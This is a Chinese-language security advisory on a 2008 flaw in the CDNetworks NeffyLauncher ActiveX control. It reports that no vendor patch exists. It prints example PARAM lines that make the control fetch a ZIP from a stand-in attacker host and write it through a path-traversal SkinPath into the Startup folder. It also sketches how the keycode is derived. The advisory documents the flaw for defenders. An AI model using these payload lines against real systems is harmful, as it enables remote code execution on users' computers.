发布日期：2008-04-07
更新日期：2008-04-08

受影响系统：

CDNetworks NeffyLauncher 1.0.5

描述：

---

BUGTRAQ  ID: 28666

CDNetworks是亚洲最大的CDN服务供应商，提供各种在线游戏和视频服务。

CDNetworks所提供的ActiveX控件实现上存在漏洞，远程攻击者可能利用此漏洞控制用户系统。

Neffycient Download（NeffyLauncher.dll，AA07EBD2-EBDD-4BD6-9F8F-114BD513492C）是CDNetworks所提供的ActiveX控件，用于通过HTTP、FTP等下载和升级游戏安装文件。如果用户对使用该控件站点的版面拥有写权限的话，或获得了有效的keycode的话，就可以修改HttpSkin、SkinPath的值。站点上的恶意文件必须压缩为ZIP文件，例如，以下修改可以将恶意文件拷贝到Windows的根目录：
<PARAM NAME="HttpSkin" VALUE="http://www.attacker.com/maliciousFiles.zip">
<PARAM NAME="SkinPath" VALUE="../../../../">

这样攻击者就可以将SkinPath的值修改为所有用户的开始程序文件夹，当用户启动计算机时就会执行恶意程序。

攻击者还可以通过调试这个ActiveX控件来生成keycode值。keycode值的前两个数字代表域的长度（16进制），接下来的5个（或更多）数字用于计算域。

<*来源：Simon Ryeo （bar4mi@gmail.com）
  
  链接：http://marc.info/?l=bugtraq&m=120759783219571&w=2
        http://secunia.com/advisories/29692/
*>

建议：

---

厂商补丁：

CDNetworks
----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.cdnetworks.com/

浏览次数：2527
严重程度：0（网友投票）